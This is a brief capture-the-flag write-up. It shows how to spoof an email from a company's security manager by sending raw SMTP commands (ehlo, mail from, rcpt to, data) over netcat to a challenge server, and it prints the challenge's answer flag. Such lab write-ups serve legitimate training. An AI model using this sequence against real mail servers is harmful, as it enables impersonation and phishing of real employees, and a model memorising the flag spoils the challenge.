If we perform some OSINT, we can find an employee list.
There are some interesting users we can use to spoof an email from, but ultimately we will choose the Security Manager, Joe Daveren
Connect to challenge using netcat -c
nc -C $chal $port
Send email as IT Sec Manager – Get flag
Ref: https://szclsya.me/posts/net/send-email-with-netcat/
ehlo pyrchdata (This doesn’t matter as long as we send the ehlo with some data)
mail from: <jdaveren@pyrchdata.com> (this needs to be lowercase)
rcpt to: <swilliams@pyrchdata.com> (this needs to be lowercase)
data
Gimme flag (This doesn’t matter, we can send whatever)
flag{54c6ec05ca19565754351b7fcf9c03b2}
Killian Sherer 